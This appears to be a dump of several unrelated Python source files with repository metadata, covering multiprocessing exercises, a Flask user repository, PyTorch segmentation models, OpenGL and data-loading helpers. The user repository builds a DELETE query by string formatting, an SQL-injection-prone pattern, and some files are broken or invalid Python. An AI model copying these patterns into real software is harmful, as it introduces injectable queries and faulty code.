myindex = self.proxy_model.index(myindex.row()-1, myindex.column())
if(myindex.isValid() == True):
self.gui['view'].edit(myindex)
#create list of columns to hide
def CollumnsToHide(self):
ai = dstore.Get("additional_info")
columns = []
for k,v in ai.items():
#dict
if ("checked" in v):
if(v['checked'] == 0):
columns.append(k)
continue
#list of dict
c = 0
for item in v:
c = c+1
if(item['checked'] == 0):
columns.append(k+""+str(c))
return columns
if __name__ == "__main__":
import sys
from PyQt4 import QtGui
from Ui_App import Ui_MainWindow
from ewitis.gui.Ui import appWindow
from ewitis.gui.Ui import Ui
from ewitis.gui.UiAccesories import uiAccesories
print "START"
app = QtGui.QApplication(sys.argv)
appWindow.Init()
uiAccesories.Init()
model = DfModelTimes()
proxymodel = DfProxymodelTimes()
dfTableTimes = DfTableTimes()
dfTableTimes.Init()
dfTableTimes.Update()
appWindow.show()
sys.exit(app.exec_())
tableTimes = DfTableTimes()
| [
"[email protected]"
]
| |
6e8ee652e5e7b105b697cf9fdec23a5e025e1dee | 4a9dada02c749e9e5277fe1e35357d7b2b28ad5c | /郝嘉良2018013383/操作系统实验/作业3.py | 44b2f84b1cc0ec63e1941c65a01a64ac57e05c53 | []
| no_license | wanghan79/2020_Option_System | 631cc80f52829390a128a86677de527472470348 | f37b870614edf7d85320da197d932df2f25a5720 | refs/heads/master | 2021-01-09T13:10:05.630685 | 2020-07-10T03:30:39 | 2020-07-10T03:30:39 | 242,312,271 | 13 | 9 | null | 2020-07-04T16:13:11 | 2020-02-22T09:12:56 | Python | UTF-8 | Python | false | false | 4,488 | py | import multiprocessing
import threading
import logging
import time
# 1.多进程实例演示
def hello(i):
print('hello, im', i)
if __name__ == '__main__':
for i in range(10):
p = multiprocessing.Process(target=hello, args=(i,))
p.start()
# 2.多进程自定义进程名称
logging.basicConfig(
level=logging.DEBUG,
format="(%(threadName)-10s) %(message)s",
)
def worker():
name = multiprocessing.current_process().name
logging.debug('%s 开始' % name)
time.sleep(3)
logging.debug('%s 结束' % name)
def my_service():
name = multiprocessing.current_process().name
logging.debug('%s 开始' % name)
time.sleep(3)
logging.debug('%s 结束' % name)
if __name__ == '__main__':
service = multiprocessing.Process(
name='my_service',
target=my_service,
)
worker_1 = multiprocessing.Process(
name='worker_1',
target=worker,
)
worker_2 = multiprocessing.Process(
target=worker,
)
service.start()
worker_1.start()
worker_2.start()
# 3.守护进程无等待的方式
logging.basicConfig(
level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
def daemon():
p = multiprocessing.current_process()
logging.debug('%s %s 开始' % (p.name, p.pid))
time.sleep(2)
logging.debug('%s %s 结束' % (p.name, p.pid))
def no_daemon():
p = multiprocessing.current_process()
logging.debug('%s %s 开始' % (p.name, p.pid))
logging.debug('%s %s 结束' % (p.name, p.pid))
if __name__ == '__main__':
daemon_obj = multiprocessing.Process(
target=daemon,
name='daemon'
)
daemon_obj.daemon = True
no_daemon_obj = multiprocessing.Process(
target=no_daemon,
name='no_daemon'
)
no_daemon_obj.daemon = False
daemon_obj.start()
time.sleep(1)
no_daemon_obj.start()
# 4.守护进程设置等待超时时间
logging.basicConfig(
level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
def daemon():
p = multiprocessing.current_process()
logging.debug('%s %s 开始' % (p.name, p.pid))
time.sleep(2)
logging.debug('%s %s 结束' % (p.name, p.pid))
def no_daemon():
p = multiprocessing.current_process()
logging.debug('%s %s 开始' % (p.name, p.pid))
logging.debug('%s %s 结束' % (p.name, p.pid))
if __name__ == '__main__':
daemon_obj = multiprocessing.Process(
target=daemon,
name='daemon'
)
daemon_obj.daemon = True
no_daemon_obj = multiprocessing.Process(
target=no_daemon,
name='no_daemon'
)
no_daemon_obj.daemon = False
daemon_obj.start()
time.sleep(1)
no_daemon_obj.start()
daemon_obj.join(1)
logging.debug('daemon_obj.is_alive():%s' % daemon_obj.is_alive())
no_daemon_obj.join()
# 5.进程的终止,注意:terminate的时候,需要使用join()进程,保证进程成功终止
logging.basicConfig(
level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
def slow_worker():
print('开始工作')
time.sleep(0.1)
print('结束工作')
if __name__ == '__main__':
p = multiprocessing.Process(
target=slow_worker
)
logging.debug('开始之前的状态%s' % p.is_alive())
p.start()
logging.debug('正在运行的状态%s' % p.is_alive())
p.terminate()
logging.debug('调用终止进程的状态%s' % p.is_alive())
p.join()
logging.debug('等待所有进程运行完成,状态%s' % p.is_alive())
# 6.进程退出状态码
def exit_error():
sys.exit(1)
def exit_ok():
return
def return_value():
return 1
def raises():
raise RuntimeError('运行时的错误')
def terminated():
time.sleep(3)
if __name__ == '__main__':
jobs = []
funcs = [
exit_error,
exit_ok,
return_value,
raises,
terminated,
]
for func in funcs:
print('运行进程的函数名 %s' % func.__name__)
j = multiprocessing.Process(
target=func,
name=func.__name__
)
jobs.append(j)
j.start()
jobs[-1].terminate()
for j in jobs:
j.join()
print('{:>15}.exitcode={}'.format(j.name, j.exitcode)) | [
"[email protected]"
]
| |
5e5a54d0191082f22946db5b5b2325b7c67c51d2 | 6e86e685d0469f131446c809c1478c8faf27a382 | /jhmanager/repo/users.py | 582b475baddd69a97050511ed92ca6afd4986e97 | []
| no_license | CardinisCode/jobhuntmanager | 551091e35ab30704c42191f3c35b2e91a5f7a704 | 23be1e10bdaaa9d203090fbbd9a44fe0472f8b18 | refs/heads/master | 2023-04-26T06:47:44.726364 | 2021-05-25T13:04:34 | 2021-05-25T13:04:34 | 317,517,242 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,453 | py | from jhmanager.repo.database import SqlDatabase
from datetime import date, time
from flask import flash
import sqlite3
class User:
def __init__(self, db_fields):
self.user_id = db_fields[0]
self.username = db_fields[1]
self.hash = db_fields[2]
self.email = db_fields[3]
self.date = db_fields[4]
class UserRepository:
def __init__(self, db):
self.db = db
def createUser(self, fields):
cursor = self.db.cursor()
command = """
INSERT INTO users
(username, hash, email, date)
VALUES (?, ?, ?, ?)
"""
result = cursor.execute(command, tuple(fields.values()))
self.db.commit()
return result.lastrowid
def getUserByID(self, user_id):
cursor = self.db.cursor()
result = cursor.execute("SELECT * FROM users WHERE user_id=?", (user_id,))
self.db.commit()
user_result = User(result.fetchone())
return user_result
def getUserByUsername(self, username):
cursor = self.db.cursor()
result = cursor.execute("SELECT * FROM users WHERE username=?", (username,))
self.db.commit()
return result.fetchone()
def getUserByEmail(self, email):
cursor = self.db.cursor()
result = cursor.execute("SELECT * FROM users WHERE email=?", (email,))
self.db.commit()
return result.fetchone()
def updateUserEmailByID(self, fields):
cursor = self.db.cursor()
command = """
UPDATE users
SET email = ?
WHERE user_id = ?
"""
cursor.execute(command, tuple(fields.values()))
self.db.commit()
def updateUserHashByID(self, fields):
cursor = self.db.cursor()
command = """
UPDATE users
SET hash = ?
WHERE user_id = ?
"""
cursor.execute(command, tuple(fields.values()))
self.db.commit()
def deleteUserByID(self, user_id):
message = ""
try:
cursor = self.db.cursor()
command = "DELETE FROM users WHERE user_id = {}".format(user_id)
cursor.execute(command)
self.db.commit()
message = "User details deleted successfully."
except sqlite3.Error as error:
message = "User details failed to delete. " + error
finally:
return message | [
"[email protected]"
]
| |
745e496a4d5f14874c52650c007e52a0330e2f34 | c0613b519124979d1de12614a9a7a745f9c9a66f | /xarray_leaflet/transform.py | 8d1eb0ac19ca7d3304887c784e7dc8a224b59fd8 | [
"MIT"
]
| permissive | netgodz/xarray_leaflet | 1cccb67251dd81817c6893f47a55989846d03062 | d4c22781243e8e4900cd43a4479cfc932f68bdcf | refs/heads/master | 2023-07-16T15:15:47.090465 | 2021-08-06T20:16:46 | 2021-08-07T06:20:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,118 | py | import warnings
import numpy as np
import xarray as xr
def passthrough(array, *args, **kwargs):
return array
def normalize(array, *args, **kwargs):
vmin = np.min(array).values
vmax = np.max(array).values
array = (array - vmin) / (vmax - vmin)
return array
def coarsen(agg_func=xr.core.rolling.DataArrayCoarsen.mean):
def _(array, *args, **kwargs):
tile_width = kwargs['tile_width']
tile_height = kwargs['tile_height']
if len(array.shape) > 2:
# it's an RGB array
array_2d = array.isel(rgb=0)
else:
array_2d = array
ny, nx = array_2d.shape
wx = nx // (tile_width * 2)
wy = ny // (tile_height * 2)
dim = {}
if wx > 1:
dim['x'] = wx
if wy > 1:
dim['y'] = wy
array = array.coarsen(**dim, boundary='pad')
# ignore "mean of empty slice" warning in np.nanmean
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=RuntimeWarning)
array = agg_func(array)
return array
return _
| [
"[email protected]"
]
| |
171345562deab9b5d2ed7d77b42ef9ca9b3a89fe | 9ce3385fb9829b70f191ea9478ebfe2dd4971c80 | /render/imdraw/quad.py | 896bbb74707bf37dfa00d1980753279e53e698b4 | []
| no_license | zalavariandris/editor | f3ffce9ae2bbd70fd9e9ce1b9ce8fc7bb23468a3 | 35b8941af12da58bb190967c28a78c91d5bb43dc | refs/heads/master | 2022-12-18T10:53:24.274321 | 2020-10-01T16:58:17 | 2020-10-01T16:58:17 | 283,721,461 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,952 | py | from OpenGL.GL import *
import numpy as np
from .helpers import buffer_offset
import logging
import functools
@functools.lru_cache(maxsize=128)
def quad_geo():
positions = np.array(
[(-1.0, +1.0, 0.0),
(-1.0, -1.0, 0.0),
(+1.0, +1.0, 0.0),
(+1.0, -1.0, 0.0)],
dtype=np.float32
)
uvs = np.array(
[(0.0, 1.0),
(0.0, 0.0),
(1.0, 1.0),
(1.0, 0.0)],
dtype=np.float32
)
logging.debug("create quad geo")
return positions, uvs
@functools.lru_cache(maxsize=128)
def create_buffer(program):
positions, uvs = quad_geo()
# setup VAO
vao = glGenVertexArrays(1)
pos_vbo, uv_vbo = glGenBuffers(2) # FIXME: use single vbo for positions and vertices
glBindVertexArray(vao)
position_location = glGetAttribLocation(program, 'position')
if position_location >= 0:
glBindBuffer(GL_ARRAY_BUFFER, pos_vbo)
glBufferData(GL_ARRAY_BUFFER, positions.nbytes, positions, GL_STATIC_DRAW)
glVertexAttribPointer(position_location, 3, GL_FLOAT, False, 0, buffer_offset(0))
glEnableVertexAttribArray(position_location)
glBindBuffer(GL_ARRAY_BUFFER, 0)
else:
logging.warning("no 'position' attribute")
uv_location = glGetAttribLocation(program, 'uv')
if uv_location>=0:
glBindBuffer(GL_ARRAY_BUFFER, uv_vbo)
glBufferData(GL_ARRAY_BUFFER, uvs.nbytes, uvs, GL_STATIC_DRAW)
glVertexAttribPointer(uv_location, 2, GL_FLOAT, False, 0, buffer_offset(0))
glEnableVertexAttribArray(uv_location)
glBindBuffer(GL_ARRAY_BUFFER, 0)
else:
logging.warning("no 'uv' attribute")
glBindVertexArray(0)
logging.debug("create quad buffer: {}".format(vao))
return vao
def quad(program):
vao = create_buffer(program)
# draw
glBindVertexArray(vao)
glDrawArrays(GL_TRIANGLE_STRIP, 0, 4)
glBindVertexArray(0)
| [
"[email protected]"
]
| |
0e1aab0283ba37b62180201b79ac72c433de0f15 | 165abb376cc4ead31e9b4d49c1a0f7c917f827ae | /ixc_django_docker/settings/haystack.py | 4dfae42c1548f375d65da4f19fb6a243db1fa4c2 | []
| no_license | ixc/ixc-django-docker | 8a04d0efa1d2ac0610b7c55facc6a210b6b6584d | 2f4302d8dd52ff0d1ad7a6f5973f70bcd808f283 | refs/heads/master | 2023-08-23T10:54:56.399455 | 2023-08-22T03:38:18 | 2023-08-22T03:38:18 | 74,635,795 | 6 | 1 | null | 2021-12-09T05:44:39 | 2016-11-24T03:45:17 | Shell | UTF-8 | Python | false | false | 476 | py | # Get host and port from the environment.
ELASTICSEARCH_ADDRESS = os.environ.get(
'ELASTICSEARCH_ADDRESS', 'localhost:9200')
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.elasticsearch2_backend.Elasticsearch2SearchEngine',
'INDEX_NAME': 'haystack-%s' % PROJECT_SLUG,
'URL': 'http://%s/' % ELASTICSEARCH_ADDRESS,
},
}
HAYSTACK_SIGNAL_PROCESSOR = 'haystack.signals.BaseSignalProcessor'
INSTALLED_APPS += ('haystack', )
| [
"[email protected]"
]
| |
a5db49511995b5c0c369a2d5a308df36b8a16749 | 6e10140ec08e7581f31154a5d569cfc7fd682e04 | /ptsemseg/models/MV2_base_0.py | 1a71d201c06869955e25bb52b8a0d0f0f045bdff | []
| no_license | Spritea/pytorch-semseg-dvs-two-titan | 578d6f8518e7d50e03d7c8ac3695df2d892de255 | c481ac7b907bed38e3e08248552f8e69d8327c6d | refs/heads/master | 2021-10-25T08:33:28.658918 | 2019-04-03T02:16:30 | 2019-04-03T02:16:30 | 178,819,051 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,530 | py | import torch.nn as nn
import torch.utils.model_zoo as model_zoo
import torch
from torch.nn import functional as F
models_urls = {
'101_voc': 'https://cloudstor.aarnet.edu.au/plus/s/Owmttk9bdPROwc6/download',
'18_imagenet': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'34_imagenet': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'50_imagenet': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'152_imagenet': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
'101_imagenet': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
}
def maybe_download(model_name, model_url, model_dir=None, map_location=None):
import os, sys
from six.moves import urllib
if model_dir is None:
torch_home = os.path.expanduser(os.getenv('TORCH_HOME', '~/.torch'))
model_dir = os.getenv('TORCH_MODEL_ZOO', os.path.join(torch_home, 'models'))
if not os.path.exists(model_dir):
os.makedirs(model_dir)
filename = '{}.pth.tar'.format(model_name)
cached_file = os.path.join(model_dir, filename)
if not os.path.exists(cached_file):
url = model_url
sys.stderr.write('Downloading: "{}" to {}\n'.format(url, cached_file))
urllib.request.urlretrieve(url, cached_file)
return torch.load(cached_file, map_location=map_location)
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
def conv3x3_bn(in_channel, out_channel):
return nn.Sequential(nn.Conv2d(in_channel, out_channel, kernel_size=3, stride=1, padding=1, bias=False),
nn.ReLU(inplace=True))
class MultiResolutionFuse(nn.Module):
def __init__(self, in_size, out_size):
super(MultiResolutionFuse, self).__init__()
self.in_size=in_size
self.out_size=out_size
self.conv = nn.Conv2d(in_size, out_size, kernel_size=1, stride=1, bias=False)
def forward(self, input_low, input_high):
high_size = input_high.size()[2:]
# low channel usually > high channel
if self.in_size != self.out_size:
input_low = self.conv(input_low)
upsample_low = F.upsample(input_low, high_size, mode='bilinear')
cat = torch.cat([upsample_low, input_high], dim=1)
return cat
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = conv1x1(inplanes, planes)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = conv3x3(planes, planes, stride)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = conv1x1(planes, planes * self.expansion)
self.bn3 = nn.BatchNorm2d(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class RefineBlock(nn.Module):
def __init__(self, in_channel):
super(RefineBlock, self).__init__()
self.c1 = nn.Conv2d(in_channel, 512,kernel_size=1, stride=1, padding=0, bias=False)
self.c3_1 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1, bias=False)
self.bn = nn.BatchNorm2d(512)
self.relu = nn.ReLU(inplace=True)
self.c3_2 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1, bias=False)
def forward(self, x):
x1 = self.c1(x)
x = self.c3_1(x1)
x = self.bn(x)
x = self.relu(x)
x = self.c3_2(x)
out = x1 + x
return out
# only refine block, no FPA
class MV2_base_0_ResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000):
super(MV2_base_0_ResNet, self).__init__()
self.inplanes = 64
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.rb1_1 = RefineBlock(256)
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.rb2_1 = RefineBlock(512)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.rb3_1 = RefineBlock(1024)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.rb4_1 = RefineBlock(2048)
# self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
# self.fc = nn.Linear(512 * block.expansion, num_classes)
# only for >=res50
# self.fpa=FPA(2048,512)
# self.fpa = FPA(512, 512)
# self.rb4_2 = RefineBlock(512 * 4)
self.fuse43 = MultiResolutionFuse(512, 512)
# self.post_proc43 = conv3x3_bn(512*2,512)
self.rb3_2 = RefineBlock(512 * 2)
self.fuse32 = MultiResolutionFuse(512, 512)
self.rb2_2 = RefineBlock(512 * 2)
# self.post_proc32 = conv3x3_bn(512)
self.fuse21 = MultiResolutionFuse(512, 512)
self.rb1_2 = RefineBlock(512 * 2)
# self.post_proc21 = conv3x3_bn(512)
self.class_conv = nn.Conv2d(512, num_classes, kernel_size=3, stride=1,
padding=1, bias=True)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
ori_size = x.size()[2:]
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
l1 = self.layer1(x)
l2 = self.layer2(l1)
l3 = self.layer3(l2)
l4 = self.layer4(l3)
l1 = self.rb1_1(l1)
l2 = self.rb2_1(l2)
l3 = self.rb3_1(l3)
l4 = self.rb4_1(l4)
# l4 = self.fpa(l4)
# l4=self.rb4_2(l4)
x_fuse43 = self.fuse43(l4, l3)
x_fuse43=self.rb3_2(x_fuse43)
x_fuse32 = self.fuse32(x_fuse43, l2)
x_fuse32=self.rb2_2(x_fuse32)
x_fuse21 = self.fuse21(x_fuse32, l1)
x_fuse21=self.rb1_2(x_fuse21)
x = self.class_conv(x_fuse21)
x = F.upsample(x, ori_size, mode='bilinear')
return x
def MV2_base_0_ResNet18(num_classes, pretrained=False, **kwargs):
"""Constructs a MV1_ResNet-18 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = MV2_base_0_ResNet(BasicBlock, [2, 2, 2, 2], **kwargs, num_classes=num_classes)
if pretrained:
key = '18_imagenet'
url = models_urls[key]
model.load_state_dict(maybe_download(key, url), strict=False)
return model
def MV2_base_0_ResNet34(num_classes, pretrained=False, **kwargs):
"""Constructs a MV1_ResNet-34 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = MV2_base_0_ResNet(BasicBlock, [3, 4, 6, 3], **kwargs, num_classes=num_classes)
if pretrained:
key = '34_imagenet'
url = models_urls[key]
model.load_state_dict(maybe_download(key, url), strict=False)
return model
def MV2_base_0_ResNet50(num_classes, pretrained=True, **kwargs):
"""Constructs a MV1_ResNet-50 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = MV2_base_0_ResNet(Bottleneck, [3, 4, 6, 3], **kwargs, num_classes=num_classes)
if pretrained:
key = '50_imagenet'
url = models_urls[key]
model.load_state_dict(maybe_download(key, url), strict=False)
print("load imagenet res50")
return model
def MV2_base_0_ResNet101(num_classes, pretrained=False, **kwargs):
"""Constructs a MV1_ResNet-101 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = MV2_base_0_ResNet(Bottleneck, [3, 4, 23, 3], **kwargs, num_classes=num_classes)
if pretrained:
key = '101_imagenet'
url = models_urls[key]
model.load_state_dict(maybe_download(key, url), strict=False)
return model
def MV2_base_0_ResNet152(num_classes, pretrained=False, **kwargs):
"""Constructs a MV1_ResNet-152 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = MV2_base_0_ResNet(Bottleneck, [3, 8, 36, 3], **kwargs, num_classes=num_classes)
if pretrained:
key = '152_imagenet'
url = models_urls[key]
model.load_state_dict(maybe_download(key, url), strict=False)
return model
| [
"[email protected]"
]
| |
516db0555bf68f2992a2c77c28f9bdf347708d9d | a4e6b080d17611853374577aaecb0367366b39b5 | /glycresoft_sqlalchemy/utils/data_files.py | 9692dd3d26e4eda167b518a3793d1736dbfd05e7 | []
| no_license | mobiusklein/glycresoft_sqlalchemy | 6235b1ea2c8da9ef6b2e725a60f0b6a925f1689d | e0edf12a8d6243cc2438a6236aa0564a28f92a8a | refs/heads/master | 2020-04-06T05:38:35.849225 | 2016-11-21T03:25:26 | 2016-11-21T03:25:26 | 37,537,754 | 0 | 2 | null | 2016-11-21T03:25:27 | 2015-06-16T15:10:45 | Python | UTF-8 | Python | false | false | 2,525 | py | import os
from functools import partial
from .vendor import sqlitedict, appdir
from glycresoft_sqlalchemy.report import colors
from glycresoft_sqlalchemy.structure.data import unimod
dirs = appdir.AppDirs("GlycReSoft", "Zaia Lab", "1.0", roaming=True)
pjoin = os.path.join
data_directory = dirs.user_data_dir
cache_directory = dirs.user_cache_dir
if not os.path.exists(data_directory):
os.makedirs(data_directory)
try:
invalidation_errors = [OSError, WindowsError]
except:
invalidation_errors = [OSError]
class ResourcePath(str):
valid = True
def invalidate(self):
self.valid = False
def validate(self):
if not self.valid:
if self.exists:
self.remove()
def remove(self):
try:
os.remove(self)
except invalidation_errors:
pass
@property
def exists(self):
return os.path.exists(self)
class Resource(object):
def __init__(self, name, path, **kwargs):
self.name = name
self.path = ResourcePath(path)
self.held = kwargs.get('held', False)
self.owners = kwargs.get('owners', set())
self.ready = kwargs.get("ready", False)
def __str__(self):
return self.path
def __repr__(self):
return "Resource(name=%r, path=%r)"
def acquired(self, owner):
if owner not in self.owners:
self.owners.add(owner)
def release(self, owner):
if owner not in self.owners:
raise ValueError("%r is not a valid owner" % owner)
self.owners.remove(owner)
if len(self.owners) == 0:
self.held = False
display_store = ResourcePath(pjoin(data_directory, "display_store.db"))
unimod_store = ResourcePath(pjoin(data_directory, "unimod.db"))
glycomedb_store = ResourcePath(pjoin(data_directory, "glycome-db.db"))
glycomedb_download_cache = ResourcePath(pjoin(data_directory, "glycome-db-download-cache"))
taxonomylite_store = ResourcePath(pjoin(data_directory, "taxonomylite.db"))
def make_absolute_sqlite_sqlalchemy_uri(path):
return "sqlite:///%s" % path
def configure_color_store():
'''Use a disk-based data-store to persist color assignments
'''
color_map = colors._color_mapper.color_name_map
cmap = sqlitedict.open(display_store, "colors", autocommit=True)
cmap.update(color_map)
colors._color_mapper.color_name_map = cmap
configure_color_store()
unimod.load = partial(unimod.load, make_absolute_sqlite_sqlalchemy_uri(unimod_store))
| [
"[email protected]"
]
| |
911c01224778fd2b7f5f5f645eb0716acbf69539 | c3d0a0b6336a3ff73724fe1615eb1809dbdaaed8 | /Extra Lockdown Tasks/Logical_Operators.py | 6b1193d9bf1da442ed977288478970802a3c804f | []
| no_license | Silentsoul04/FTSP_2020 | db0dae6cd9c371f3daa9219f86520dfa66348236 | 7e603af918da2bcfe4949a4cf5a33107c837894f | refs/heads/master | 2022-12-21T20:44:32.031640 | 2020-09-20T12:29:58 | 2020-09-20T12:29:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | # Logical Operators in Python :-
# Identity
# Membership
Truth table
and , or , not
x y o/p
0 0 0
0 1 0
1 0 0
1 1 1
ex:-
x = 100
y = 200
print(x<y and y>x)
print(x<y and y<x)
OR Truth Table
x y o/p
0 0 0
0 1 1
1 0 1
1 1 1
Ex :-
x = 1001
y = 200
print(x<y or x>y)
x = True
print(not(x))
EX :-
x = 100
y = 200
print(x<y)
print(not(x<y))
# Identity Operator :-
is , is not
x = 100
#y = 200
y = 100
print(x is y)
print(x is y)
print(id(x))
print(id(y))
x = 100
y = 200
print(x is not y)
print(id(x))
print(id(y))
# Membership Operators :-
in , not in
l1 = [10,20,30,'Python','Surya']
print('Python' in l1)
print(1001 not in l1)
print('Apple' in l1)
| [
"[email protected]"
]
| |
1db20ad25163c045f050fd3441c29eb62f9bb3d9 | 2a0055c32cb34b48fd3ef705000ce373376d5439 | /src/lib/training/scene_sampler.py | f4bdc5828e958cecb388cd84228d0eef206f8bdc | [
"MIT"
]
| permissive | pfnet-research/kaggle-lyft-motion-prediction-4th-place-solution | dc60818b96eea5181b2c923ea60cdacc02dd7187 | 0bc51075db31a747eeebb7f4775a3cd26ad5f870 | refs/heads/master | 2023-01-29T16:30:38.757836 | 2020-12-09T06:18:46 | 2020-12-09T06:18:46 | 319,860,058 | 48 | 10 | null | null | null | null | UTF-8 | Python | false | false | 3,540 | py | import math
import torch
from torch.utils.data import Sampler
import torch.distributed as dist
import numpy as np
def get_valid_starts_and_ends(get_frame_arguments: np.ndarray, min_state_index: int = 0):
get_frame_arguments = get_frame_arguments[:] # put on the memory if the array is zarr
scene_change_points = np.where(np.diff(get_frame_arguments[:, 1], 1) > 0)[0] + 1
starts = np.r_[0, scene_change_points]
ends = np.r_[scene_change_points, len(get_frame_arguments)]
valid_starts, valid_ends = [], []
while len(starts) > 0:
ok = get_frame_arguments[starts, 2] >= min_state_index
valid_starts.append(starts[ok])
valid_ends.append(ends[ok])
starts, ends = starts[~ok], ends[~ok]
starts += 1
ok = starts < ends
starts, ends = starts[ok], ends[ok]
return np.concatenate(valid_starts), np.concatenate(valid_ends)
class SceneSampler(Sampler):
def __init__(self, get_frame_arguments: np.ndarray, min_state_index: int = 0) -> None:
self.starts, self.ends = get_valid_starts_and_ends(get_frame_arguments, min_state_index)
def __len__(self) -> int:
return len(self.starts)
def __iter__(self):
indices = np.random.permutation(len(self.starts))
return iter(np.random.randint(self.starts[indices], self.ends[indices]))
class DistributedSceneSampler(Sampler):
def __init__(
self,
get_frame_arguments: np.ndarray,
min_state_index: int = 0,
num_replicas=None,
rank=None,
shuffle=True,
seed=0
) -> None:
if num_replicas is None:
if not dist.is_available():
raise RuntimeError("Requires distributed package to be available")
num_replicas = dist.get_world_size()
if rank is None:
if not dist.is_available():
raise RuntimeError("Requires distributed package to be available")
rank = dist.get_rank()
self.starts, self.ends = get_valid_starts_and_ends(get_frame_arguments, min_state_index)
self.num_replicas = num_replicas
self.rank = rank
self.epoch = 0
self.num_samples = int(math.ceil(len(self.starts) * 1.0 / self.num_replicas))
self.total_size = self.num_samples * self.num_replicas
self.shuffle = shuffle
self.seed = seed
def __iter__(self):
if self.shuffle:
# deterministically shuffle based on epoch and seed
g = torch.Generator()
g.manual_seed(self.seed + self.epoch)
indices = torch.randperm(len(self.starts), generator=g).tolist()
else:
indices = list(range(len(self.starts)))
# add extra samples to make it evenly divisible
indices += indices[:(self.total_size - len(indices))]
assert len(indices) == self.total_size
# subsample
indices = indices[self.rank:self.total_size:self.num_replicas]
assert len(indices) == self.num_samples
return iter(np.random.randint(self.starts[indices], self.ends[indices]))
def __len__(self):
return self.num_samples
def set_epoch(self, epoch):
r"""
Sets the epoch for this sampler. When :attr:`shuffle=True`, this ensures all replicas
use a different random ordering for each epoch. Otherwise, the next iteration of this
sampler will yield the same ordering.
Arguments:
epoch (int): Epoch number.
"""
self.epoch = epoch
| [
"[email protected]"
]
| |
51722ce4582e94fa2bcfb5e42f6fbbe0258d6a0f | da3b9260ee5b352c9438a43d155cebedd46e2fc9 | /emlearn/tools/window_function.py | ef59e239eb95e8de7970a2e6a2d284d740b21f6d | [
"MIT"
]
| permissive | profjefer/emlearn | 8eadde4d63f8cb2edd1d33a556039b5b08185bf2 | cc5fd962f5af601c02dfe0ec9203d1b30e6b3aef | refs/heads/master | 2023-07-15T02:36:56.072459 | 2021-08-08T09:52:00 | 2021-08-08T09:52:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,315 | py |
"""eml-window-function: Generating C code for window functions
Part of the emlearn project: https://emlearn.org
Redistributable under the MIT license
"""
import argparse
import textwrap
from .. import cgen
# Supports everything without parameters in scipy.signal.get_window
_known = 'boxcar, triang, blackman, hamming, hann, bartlett, flattop, parzen, bohman, blackmanharris, nuttall, barthann'
known_window_types = tuple(_known.split(', '))
def parse(args=None):
parser = argparse.ArgumentParser(description='Generate lookup table for window functions')
